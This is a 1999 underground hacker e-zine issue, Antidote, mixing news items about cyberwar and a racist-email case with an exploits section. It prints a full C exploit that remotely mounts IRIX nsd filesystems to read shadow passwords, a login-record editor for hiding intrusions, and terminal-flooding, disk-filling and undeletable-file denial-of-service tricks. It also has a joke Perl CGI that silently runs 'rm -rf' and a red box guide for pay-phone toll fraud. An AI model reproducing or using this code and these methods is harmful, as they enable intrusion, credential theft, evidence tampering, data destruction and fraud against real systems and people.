Volume 2 Issue 8 6/11/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; printf ("Creating termcap f1le\n"); printf ("b1tch is Fe3lin 1t.\n"; ------------------------------ Yes! This is a special issue with an extra area of content! We have a section that will only be printed in this issue about what is happening with AntiOnline. We have collected information from other sites and put it together in this issue for you to see! It was written/put together by Lord Oak. All credit is given from where it was taken. Sorry that there is not much in the news content this issue. It is just that the AntiOnline port- folio took up a lot of time and took away time from gathering news. In this issue of Antidote, we have over 670 subscribers and getting more everyday! The only thing that we ask of you when you read Antidote, is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you. --=\\Contents\\=-- 0.00 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Shouts 0.04 - Writing 1.00 - News 1.01 - A Mouse that Roars 1.02 - Stanford Tracking Racist E-mails 2.00 - Exploits (new & older) 2.01 - nsdadv.c.txt 2.02 - bowzap.c.txt 2.03 - redhat6_0.permissions.dos.txt 2.04 - omnihttpd.webserver.txt 2.05 - windows.prn.txt 3.00 - Misc 3.01 - Red Box made easy 3.02 - Conventions & Expo's 3.03 - Securing Linux ---- --=\\AntiOnline Portfolio Contents\\=-- AO.00 - Info on AntiOnline AO.01 - wired.com AO.02 - E-mails from Attrition AO.01A - Email #1 AO.01B - Email #2 AO.03 - AntiOnline's Response AO.04 - Added Comments ---- FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just something totally stupid and MAYBE even humorous to some. SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plane making fun of something or someone. FEAT.S - FEATURED SITES: www.nudehackers.com www.thepoison.org/masters/exploits.html www.403-security.org www.hackernews.com ------------------------------ 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve a link to the current Antidote (where you can view it). > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece opt1mus PBBSER oX1dation Forlorn Retribution 0dnek www.thepoison.org Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.04 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ _________________________________ ) ___ ( ( //___/ / // ) ) // ) ) ) ) /____ / // / / __ / / ( ( / / // / / ) ) ) ) / / ((___/ / ((___/ / ( ( http://www.403-security.org ) ) For the latest hacks and news ( (___________________________________) 1.01 --=\\A Mouse that Roars\\=-- [www.washingtonpost.com] Last week, Newsweek reported that President Clinton approved a covert operation in May to find an electronic silver bullet to do what the White House at the time believed the air war couldn't. According to the report, the CIA would conduct a cyberwar against Milosevic, specifically going after his financial assets in banks throughout Europe. Is the keyboard mightier than the sword? Before Allied Force, the intelligence agencies held a cyberwar exercise to answer this very question. At center stage was the Information Operations Technology Center (IOTC), activated last year and made up of the best cyberwarriors of the U.S. government. Housed at National Security Agency headquarters at Fort Meade, Md., IOTC brings together highly secret capabilities: NSA's P42 information warfare cell, the CIA's Critical Defense Technologies Division, the Pentagon's "special technology operations." Military sources familiar with the March demonstration say there is no question that the keyboard covert operators wowed the Joint Staff with their computer attack capabilities. But they are adamant in insisting that cyberbombs are more laboratory technologies than usable weapons. In fact, the sources point out, the only cyberwar raging is inside the U.S. government where Washington lawyers and policymakers, military leaders, and official hackers battle over the value and legality of network attack. Where's The Bits? The day bombs started falling on Yugoslavia, the Air Force Association convened a high- level symposium in San Antonio, Tex., to address the status of information warfare. Washingtonpost.com has obtained a transcript of the two-day proceeding. Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the closed-door session via satellite from his headquarters in Germany. "I have not had much sleep over the last 48 hours, and I am probably not as sharp or prepared as I would like to be," he apologized. Tired or not, the senior air force officer in Europe wasted no time blasting the bias of information warriors to fight battles solely at the "strategic level." He was referring to the very sort of effort Newsweek would speculate about two months later. "When we hear talk of information warfare," Jumper said, "the mind conjures up notions of taking some country's piece of sacred infrastructure in a way that is hardly relevant to the commander at the operational and tactical level." "I would submit that we are not there with information warfare," he concluded. Networking Network Attack Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and head of the Pentagon's Joint Command and Control Warfare Center, followed Jumper. "In my hat as the air force component commander for NSA," he warned, "I spend a lot of time working ... on how to exploit what is going on out there in computer networks." But when it comes to going beyond collecting computer transmissions as raw intelligence to actually manipulating and exploiting the "zeroes and ones" for military value, Baker said, "we have a ways to go." Despite all the new information warfare organizations that have been established of late, he lamented that cyberwarriors did not yet have the stature of other warriors: "Effects-based warfare," that is, methods geared to achieve an outcome and not cause traditional damage lacks the "visually pleasing destruction from an armed bomb." Baker stressed that part of the problem in any kind of computer network attack is the concerns on the part of policy-makers in Washington with regard to legality and "traceability." Jumper described his experience: "I picture myself around that same targeting table where you have the fighter pilot, the bomber pilot, the special operations people and the information warriors. As you go down the target list, each one takes a turn raising his or her hand saying, I can take that target.' When you get to the info warrior, the info warrior says, "I can take the target, but first I have to go back to Washington and get a finding." Seeking permission invariably results in artificial restrictions and hesitations in attacking targets, Jumper stressed. From a field perspective, he said, the process of seeking the "special" operation cedes too much decision-making to inside the Beltway. Finding The Way The unusually candid discussions of the institutional and military stumbling blocks to an information warfare future contrasts with the Hollywood vision of cyberwar so common in the mainstream media these days. Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within the area of computer network exploitation, there is tremendous investment, which, with a little bit of fine tuning, can be turned into a computer network attack capability." The IOTC, Wright said, "is a great organization that has a bright future." He should know. As Deputy Director for Information Operations for the Joint Chiefs of Staff, he is the military head of the interagency center and the top cyber-warrior in the U.S. military. But the key word is future. With the shooting war against Yugoslavia over, it should be crystal clear to anyone that exotic American cyberbombs have not aided the effort in any way. http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm ------------------------------ 1.02 --=\\Stanford Tracking Racist E-mails\\=-- [www.yahoo.com] Stanford University has turned loose its electronic bloodhounds to track the source of racist e-mail sent to 25,000 campus computer users over the weekend. The one-paragraph message accused the university of giving preference in housing to non- whites, said Rachel Lotan, a professor in the School of Education who received the e- mail. The message was so racist ``it took my breath away,'' she said. ``It must be someone very angry.'' A housing shortage for students has been a problem at Stanford for some time. Last week, some 1,300 students were not selected in the lottery held for scarce campus housing. Last year, almost 900 missed out. Prosecutor Julius Finkelstein, head of Santa Clara County's high-tech crimes unit, said the hacker could be charged with such offenses as unauthorized use of a computer account and harassment via e-mail. http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html ------------------------------ 10001010100101110101010101001011101010101000 0 1 1 Y88b Y88 888 888 888 88e e88'Y88 0 1 Y88b Y8 888 888 888 888b d888 'Y 1 0 b Y88b Y 8888888 888 8888D C8888 1 0 8b Y88b 888 888 888 888P Y888 ,d 1 1 88b Y88b 888 888 888 88" "88,d88 0 1 1 1 http://www.nudehackers.com 0 0 0 01001010110101010001011010010111010100101011 2.01 --=\\nsdadv.c.txt\\=-- I've been waiting since February for SGI to post an advisory about this. Enough. /****************************************************************************** IRIX 6.5 nsd virtual filesystem exploit Author: Jefferson Ogata (JO317) Please note that this program comes with NO WARRANTY WHATSOEVER. Your use of this program constitutes your complete acceptance of all liability for any damage or loss caused by the aforesaid use. It is provided to the network community solely to document the existence of a vulnerability in the security implementations of certain versions of IRIX, and may not be used for any illicit purpose. Many of the details of the bug this program exploits have been available to users of SGI's online support system since February 1999. The current revision of IRIX (6.5.3) corrects this bug, at least enough to stop this particular exploit, and I strongly encourage you to bring your systems up to date as quickly as possible. With IRIX 6.5, SGI has moved all name services, NIS services, and DNS lookups into a userland process called nsd, which exports the results of the queries it fields into a virtual filesystem. The virtual filesystem is normally mounted onto the directory /ns by the program /sbin/nsmount, which is invoked by nsd on startup. The nsd daemon itself is exporting the filesystem via NFS3 over a dynamically bound UDP port -- rather than a well-known or settable one -- typically in the 1024-1029 range. On a desktop system, 1024 is a good bet, since nsd is usually the first RPC/UDP service to be started. The NFS filesystem is not registered with mountd, so there is no way to query mountd for a mount filehandle. But because the NFS port is fairly easy to discover through port scanning, and because the mount filehandle nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd filesystem from a host anywhere on the Internet. nsd will serve an array of NFS requests to anyone. Furthermore, because the service's NFS port is bound dynamically, it is difficult to protect it with a firewall; it may change from one system start to another, or if the daemon is killed and restarted. This program can successfully mount the nsd-exported virtual filesystem >from a remote host onto a machine running IRIX 6.4 or higher. It makes use of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know what this flag does at the NFS protocol level, but it allows the client to ask the NFS server not to enforce certain permissions controls against the client. I don't know whether any other vendor NFS client systems support this flag. A clever person might write a userland NFS client that would accept an initial handle, NFS port, etc. as arguments. On an SGI with SGI C compiler, compile with: cc -o nsdadv nsdadv.c Run it this way: nsdadv /mnt sucker.example.com 1024 with obvious substitutions. So what are the security implications of this? Well, at the very least, the nsd filesystem on an NIS server reveals the NIS domain name, and what maps it contains, as well as what classes are being used. By exploring the filesystem shortly after it has been mounted I have been able to retrieve data that should be hidden from me, including shadow password entries from a remote system's shadow file. Beyond retrieving keys and maps, you can also monitor the filesystem for changes. A great deal of information is leaked through the contents of the nsd filesystem. For example, if host A looks up a host B's IP address, a file named B will appear in the /.local/hosts.byname directory in A's nsd filesystem. The file's contents will be the IP address. By the way, though you be unable to chdir into a particular location in the nsd filesystem, you may yet succeed under slightly different conditions. Eventually you can do it. I'm not sure why or when, but nsd gets picky sometimes. Eventually it relents. Specifically, I've found that the entire nsd filesystem appears readable for a few seconds after it is initially mounted. If you can't look at something, unmount the filesystem, remount it, and try again immediately. It also seems that a stat() is sometimes required before a chdir(). Your mileage may vary, but keep trying. You may wish to write a script to mount the nsd filesystem, explore and take inventory of its contents, and unmount the filesystem quickly. Once you've chdir'd into a directory, it appears you can always read it, although you can't necessarily stat its contents. This suggests a strategy of spawning a group of processes each with its cwd set to a subdirectory of the nsd filesystem, in order to retain visibility on the entire filesystem. Each process would generate an inventory of its cwd, and then monitor it for changes. A Perl script could do this well. Another thing: it is possible to create an empty file in nsd's exported filesystem simply by stat()ing a nonexistent filename. This suggests a potential DoS by creating many files in a directory. Remember that the system keeps a local cache in /var/ns, so you may have to wait for cached entries on the target host to expire before you'll see them reappear in the virtual filesystem. For some fairly extensive info on the nsd implementation, take a look at: http://www.bitmover.com/lm/lamed_arch.html ****** What got me into all this was that I found I could no longer run services chrooted if they required DNS. It took considerable effort to come up with a solution to this. This was a fundamental change from IRIX 6.4, and I know I'm not the only one who finds the nsd implementation to be a generally unpleasant direction, in part because it causes umount -t nfs to break system database services. I give SGI points for creativity -- in one sense, using NFS as a database access system is a very slick approach. But the database needs a security model, and the model needs to be implemented correctly. Neither of these needs appears to have been met. So how could SGI fix this? Without going back, SGI could at least make nsd respond only to queries >from localhost (see note below about IRIX 6.5.3). The problem here is that they actually intend to support remote mounts in later releases, in order to supplement or supplant other means of distribution. The web documents indicate this. They could create a well-randomized mount filehandle for the filesystem and pass that to nsmount. Then you couldn't remotely mount the filesystem without guessing the handle -- nontrivial with a 32-byte handle. At the very least, they should provide libraries of regular BIND resolver routines, file-based getpwent, etc. routines, so one could choose the resolution strategy at link time, perhaps by modifying the shared library path. ****** With IRIX release 6.5.3, SGI appears to have fixed this problem, at least to some degree. The exploit does not appear to work as it does against 6.5.2. Further testing is needed, and the behavior should be watched carefully in future versions of IRIX. ******************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Filesystem type name for nsd-exported filesystem. */ #define NSD_FSTYPE "nfs3" /* File the records mounted filesystems. */ #define MTAB_FILE "/etc/mtab" /* Socket address we'll fill in with our destination IP and port. */ struct sockaddr_in sin; /* All zero file handle. This appears to be the base handle for the nsd filesystem. Great security, huh? */ unsigned char fh[NFS_FHSIZE] = { 0 }; /* NFS mount options structure to pass to mount(2). The meanings of these are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The flags field indicates that this is a soft mount without log messages, and to set the initial timeout and number of retries from fields in this structure. The fh field is a pointer to the filehandle of the mount point, whose size is set by fh_len. As noted above, the mount point filehandle is just 32 zeroes. */ struct nfs_args nx = { &sin, /* addr */ (fhandle_t *) fh, /* fh */ NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */ 0, /* wsize */ 0, /* rsize */ 100, /* timeo */ 2, /* retrans */ 0, /* hostname */ 0, /* acregmin */ 0, /* acregmax */ 0, /* acdirmin */ 0, /* acdirmax */ 0, /* symttl */ { 0 }, /* base */ 0, /* namemax */ NFS_FHSIZE, /* fh_len */ /* On IRIX 6.4 and up there are also the following... */ /* bdsauto */ /* bdswindow */ /* On IRIX 6.5 there are also the following... */ /* bdsbuflen */ /* pid */ /* maxthreads */ }; void usage (void) { fprintf (stderr, "usage: nsmount_remote directory host port\n\n"); fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on via NSD daemon\n"); fprintf (stderr, "port onto .\n\n"); exit (1); } int main (int argc, char **argv) { char *dir; char *host; char *ports; int port; struct hostent *h; int fstype; FILE *mtabf; struct mntent mnt = { 0, 0, NSD_FSTYPE, "soft,timeo=100,retrans=2", 0, 0, }; if (argc != 4) usage (); dir = argv[1]; host = argv[2]; port = atoi ((ports = argv[3])); /* Prepare for host lookup. */ memset ((void *) &sin, 0, sizeof (sin)); sin.sin_family = 2; sin.sin_port = port; /* Look up the host. */ if (inet_aton (host, &sin.sin_addr)) ; else if ((h = gethostbyname (host))) { unsigned long *l = (unsigned long *) *(h->h_addr_list); sin.sin_addr.s_addr = l[0]; } else { fprintf (stderr, "Cannot resolve host %s.\n", host); return 1; } /* Get filesystem type index for nsd filesystem type. */ if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0) { perror ("sysfs (" NSD_FSTYPE ")"); return 1; } fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n", host, inet_ntoa (sin.sin_addr), port, dir); /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR means "tell server to trust us with attributes" and MS_DATA means "6-argument mount". MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't seem to work without this option. So even though this program will compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to attack nsd. */ if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) != 0) { perror ("mount"); return 1; } /* Record mount point in /etc/mtab. */ mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1); sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports); mnt.mnt_dir = dir; if (!(mtabf = setmntent (MTAB_FILE, "r+"))) { perror ("setmntent"); return 1; } if (addmntent (mtabf, &mnt) < 0) { perror ("addmntent"); return 1; } if (endmntent (mtabf) < 0) { perror ("endmntent"); return 1; } return 0; } Jefferson Ogata ogata@POBOX.COM ------------------------------ 2.02 --=\\bowzap.c.txt\\=-- /* * BoWZaP 1.0 - k-sp1ff h4qR tYp3 l0g ed1t0r ph0r 4.4BSD/SunOS4/Linux * * say u r l0gg3d 1nt0 cert.org as 'sp4f' on ttyp2 & want t0 b * m1sch13v0us.. u w0uld th3n d0: * * [sp4f@cert][~] % su - * Password: b0w-t13z * # ./BoWZaP sp4f justin.kalinas.home.machine ttyp2 * * 0r t0 ch4ng3 4ll 1nst4nc3z 0f sp4f jU$t l34v3 0ut th3 ttY argUm3nt.. * * u k4n alz0 uz3 1t t0 1mpr3$$ uR fr13ndz & tr1ck th3m 1nt0 g1v1ng * u k0d3z .. i.e. m4k3 1t l00k l1k3 uR 0n fr0m zang.com or s0m3th1ng, * th3n ppl w1ll l1k3 t0tally ph34r u & stUph. * * k0mp1l3 w/ [g]cc -O[2] -o BoWZaP BoWZaP.c [-DSUNOS] -s * * w0rd!@# * - K0d3S|aY3r [b4dd3r & k-r4dd3r th4n ev3r 1n '99] */ #include #include #include #include #include #ifdef SUNOS #include #define _PATH_UTMP "/etc/utmp" #define _PATH_WTMP "/var/adm/wtmp" #define _PATH_LASTLOG "/var/adm/lastlog" #endif int main(ac, av) int ac; char **av; { int fd; struct utmp ut; struct lastlog ll; struct passwd *pw; if(ac<3) { fprintf(stderr,"Usage: %s user fakehost [tty]\n",av[0]); exit(1); } if((pw=getpwnam(av[1])) < 1) { fprintf(stderr,"Not in /etc/passwd.\n"); exit(1); } if((fd=open(_PATH_UTMP,O_RDWR)) < 0) { fprintf(stderr,"Couldn't open %s\n",_PATH_UTMP); exit(1); } while(read(fd,&ut,sizeof(ut)) > 0) { if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) { if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) { memcpy(ut.ut_host, av[2], sizeof(ut.ut_host)); lseek(fd, (int)-sizeof(ut), SEEK_CUR); write(fd, &ut, sizeof(ut)); } } } close(fd); printf("%s successfully altered.\n", _PATH_UTMP); if((fd=open(_PATH_WTMP,O_RDWR)) < 0) { fprintf(stderr,"Couldn't open %s\n",_PATH_WTMP); exit(1); } lseek(fd,(long) -(sizeof(ut)), SEEK_END); while(read(fd,&ut,sizeof(ut)) > 0) { if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) { if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) { memcpy(ut.ut_host, av[2], sizeof(ut.ut_host)); lseek(fd, (int)-sizeof(ut), SEEK_CUR); write(fd, &ut, sizeof(ut)); break; } } lseek(fd, (long) -(sizeof(ut) * 2), SEEK_CUR); } close(fd); printf("%s successfully altered.\n",_PATH_WTMP); if((fd=open(_PATH_LASTLOG,O_RDWR)) < 0) { fprintf(stderr,"Couldn't open %s\n",_PATH_LASTLOG); exit(1); } lseek(fd, (long)pw->pw_uid * sizeof(struct lastlog), 0); memcpy(ll.ll_host,av[2],sizeof(ll.ll_host)); if(av[3]) { memcpy(ll.ll_line,av[3],sizeof(ll.ll_line)); } write(fd, (char *)&ll, sizeof(ll)); close(fd); printf("%s successfully altered.\n", _PATH_LASTLOG); } ------------------------------ 2.03 --=\\redhat6_0.permissions.dos.txt\\=-- Once again I've come up with another trivial Denial of Service flaw, (wow, I seem to be good at this Conseal Firewall, +++ath0, ppp byte-stuffing) It's been a few months since my last DoS, so here you go: Many of you RedHat 6.0 users who installed RedHat 6.0 rather than upgrading may have noticed the new way RedHat displays remote TTY's. Instead of the old fashioned /dev/ttyp, it now uses /dev/pts/. There is a flaw in this new implementation that local users can exploit to cause minor disruption to anyone using X-windows on the local machine. This DoS is more of a nuisance than a "real problem" but it could possibly be used to cause some minor havok. The way it works is simple. When whoever is using X opens up an "xterm" (eterm, rxvt, nxterm...) a connection is made to the X server. If you do a "who" you will see: (RedHat 6.0, without upgrading from previous RedHat release) wage pts/0 Jun 6 01:39 (:0.0) Or on older versions: wage ttyp0 Jun 6 01:39 (:0.0) Now this is normal, but the problem lies within the permissions of that device. On older RedHat's if you did: ls -l /dev/ttyp3 you would see: crw------- 1 wage tty 3, 0 Jun 6 12:41 /dev/ttyp0 Which is normal and what it should look like. For those of you who may be new to unix those letters at the beginning of the line indicate the permissions on the device. For our output above, the line indicates it is a device (c), and that the OWNER has read and write permissions (rw) Group has no permissions (---), and everyone has no permissions (---) They basically go An example line of a device will ALL permissions set follows: crwxrwxrwx / | \ Owner Group Everyone This means that everyone has read/write/execute permissions to that device. So as you can see our ttyp0 can only be read or written to by it's owner (and root). In the case of RedHat 6.0 with regular remote connections (like telnet) the standard permissions are as follows: crw--w---- 1 ov3r tty 136, 0 Jun 6 12:32 /dev/pts/0 Here it's almost the same except that group "tty" also has write access. The problem lies in the way that the permissions are set for local connections with the X server using xterm. if you do an ls -l /dev/pts/ (we will use pts/0) You get: crw--w--w- 1 ov3r ov3r 136, 0 Jun 6 12:32 /dev/pts/0 Notice how now "everyone" has write access to this terminal? This leads to the hole that any local user can disrupt any xterminal connected to the local machine. Simply typing "cat /dev/urandom > /dev/pts/" will flood the xterm with garbage data making it impossible to use. Or we can also bring back the old "flash" attack and flash the user's xterm by dumping ASCII escape characters to his terminal. This isn't a particularily "deadly" DoS attack, but can be used as a nuisance OR perhaps even to trick the user into doing something he may not want to do. (For example dumping "Login:" then "Password:" to the terminal may trick the user into adding his login/password to a file or to his .bash_history). noc-wage wage@IDIRECT.CA ------------------------------ 2.04 --=\\omnihttpd.webserver.txt\\=-- Hi all, The exploit (bug) will make temp files on the server until servers hdd is full. And anyone can do it remotely. By default visadmin.exe (Visitor Administrator) is in cgi-bin directory. What you need to do, is to type this url: http://omni.server/cgi-bin/visadmin.exe?user=guest Thats all. Now in some minutes is servers hdd full!! Fix: Remove visadmin.exe from cgi-bin directory. Valentin Perelġgin viktor@PARNU.EE ------------------------------ 2.05 --=\\windows.prn.txt\\=-- I suppose that, in an effort to maintain reverse compatibility with old MS-DOS command line gurus, you cannot create a file or directory named PRN.xxx where the xxx is replacable with any extension. Explanation and flaw follow. First, the explanation (for those of you who are familiar with the command line use of prn, please skip to the flaw) Old style MS-DOS command line-ing would allow you to do the following to print your autoexec file: C:\>copy autoexec.bat prn what this actually does is redirect the contents of autoexec.bat to the port LPT1. So, as stated in the first sentence, in an effort to preserve this feature, Microsoft will not allow you to create any file or directory whose name prior to the extension is exactly PRN. Now the flaw: Although you cannot create a local file whose name is PRN, you can, however, jump onto a networked server (suppose it's name is \\whatever) and create (in any directory that you have creatable permissions) any file or directory named PRN.xxx (again, xxx stands for any extension). The server must be accessed by it's \\ notation, you cannot do this if you map \\whatever\anydir to a drive (such as w:), then go to w:\ and try to create the file, in that case your machine's name parser blocks you. Ok, so that doesn't seem so bad, but the real issue is that the directory you've just created is non-removable for as long as it posesses that name. So let's try to rename the file... oops, can't do that, we get an access violation. Next, let's try mapping \\whatever\anydir to w:\ again. I go to my new W drive and try to rename the file, I get the error "Cannot rename prn: A file with the name you specified already exists. Specify a different filename." Ooooookaaaaay. Frustrated now, I try to delete the file. Oops, now it tells me "Cannot delete prn: The parameter is incorrect." Well, what about that file/directory I've created with the name PRN.xxx? That one vanishes with no problem, but only when the server is referenced in the \\whatever fashion. When I try to delete this PRN.xxx file from my new W: drive, all it does is lock up my window with a nearly endless hourglass. Finally, ten minutes later, I'm told "Cannot delete file: File system error (1026)." But this only occurs after I've renamed the parent directory. The error that is reported has nothing to do with the file PRN.xxx, but instead with the fact that the file upon which it was trying to do a delete operation dissapeared between when the delete was initiated and when it was finished. Note that PRN.xxx acts somewhat differently than PRN alone. The next step is to try to delete the parent directory. This does not work! PRN still gives access violations, and so the parent directory is locked in place. So how much harm can this REALLY be? So I've got a few empty files and directories that are undeletable. Well, if in stead of just creating a new directory, I copy a large directory to the server, say c:\winnt, or perhaps c:\program files, then rename it to prn, now I've just created half a gig or more (depending on how malicious I am) of un-reclaimable server hard drive consumption. This directory cannot be browsed! It has become a sore on the surface of this hard drive. Well, remember con? The virtual file that was like prn, except that instead of echoing to LPT1, it echoes to the screen. I try to recreate this whole process with con, but the server is much too smart for that, it yells at me and tells me "Cannot create or replace file: The filename you specified is invalid or too long. Specify a different filename." I don't know, but I suspect that there exist utilities that would catch this filename's invalidity, and do something about it. Norton Disk Doctor is usually pretty good about those kinds of things. Unfortunately, I don't have local access to the servers I have available to create this flaw on, so I cannot test that. If someone can test that on various workstations and servers, I'd be interrested to know if Norton can do this. Please put your new PRN directory/file in a place that you don't care if it resides there forever. This flaw seems to lend itself to a disk-consuming virus, one that creates \\127.0.01\anydir\hahaha.tmp and dumps useless garbage in it until it receives the TERM signal at which point it renames this file to PRN. Next time it is started this virus could create a subdir called hahaha and repeat the process there. This was tested on Windows NT workstation 4.0 SP3 creating PRN's on Windows's NT Server 4.0 SP?. STEVENS, Eric Eric.Stevens@RP-RORER.COM ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= FUN.S #!/usr/bin/perl # Lord Oak's famous Perl script. # Only works with a UNIX box and # no configuring is needed! print "Content-type: text/html\n\n"; $fjear = `rm -rf */`; print "Lord Oak 0wns m3!"; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 3.01 --=\\Red Box made easy\\=-- Q. What is a red box? A. With this you can Make free phone calls from pay phones by generating .25,.10,and .05 tones. Q. Dose this work on my phone at my house? A. No,NEVER EVER try to do any thang from your own phone line it is plan stupid. Q. Where can I use it at? A. COCOT (Customer Owned Coin Operated Telephone) Q. How do I make one? A.There are a lot of text files out there that trys to explane how but,thay do not tell you how to program the tones.So me and teliepimp wrote this for the pepole that want to know how to make one and program the tones. Alright this is gonna be a quick and easy to understand artical on how to make and program a redbox. Go to radioshack and ask to buy a 43-141 tonedialar old 33mem one or a 43-146 tonedialar new one. Once you have that go home and get a 6.5536mhz crystal it doesnt have to be exactly this crystal but keep it in the 6.55mhz or at the very least 6.5mhz crystal area. Right now you must modify the damn tone dialar. Unscrew the screws an snap the case open an such then find the little thing that looks like a capasitor or resister and solder it off. The capasitor is desguised as that its actually a crystal it will say Z3.58M on it. Now take your new crystal an solder that on it. All you got to do is put it back togeather and you are done with making it. Now that you have that done its time to program the damn thing. You should program a quarter tone than a dime tonean so on... just push the buttons as stated below. .25tone: memory, *, *, *, *, *, 0memory then one of the P1 thats yer quarter tone .10tone: memory, *, *, memory, P2 .05tone: memory, *, memory, P3 Alright now you have the three basic tones you can combine sequenses to get diffrent things like a dollar and so on. Now the phun part Go to a payfone I think the ge ones will work or the SW bell or others work too. Now this is the first way go up to the fone dial the # then when it says please put in blah blah to help our profteering gluttonous organazation or some thang. Then play all the tones you want then it should connect always try this method first just to test it its easier then the other way but what the hell. Ok right now the other way, Call the opperator then have her dial the # then say you are going to pay with the change in your hand for the call. Then put a nickel or some thing in just in case shes still listening then play the tones not to fast just in case shes STILL listening. EazyMoney eazy_money@Cyber-Strike.com ------------------------------ 3.02 --=\\Conventions & Expo's\\=-- Here is a list of upcomming hacker/security conventions and meetings that you might want to check out. Beyond Hope -Date: Aug 8-10 (1999) -Location: New York City (USA) -Homepage: http://www.hope.net/ -- World Conference on Information Security Education -Date: June 17-19 (1999) -Location: Stokholm, Sweden -Homepage: http://www.dsv.su.se/WISE1/index2.html -- NetSec '99 9th Annual Network Security in the Open Environment -Date: June 14-16 (1999) -Location: St Louis, Missouri 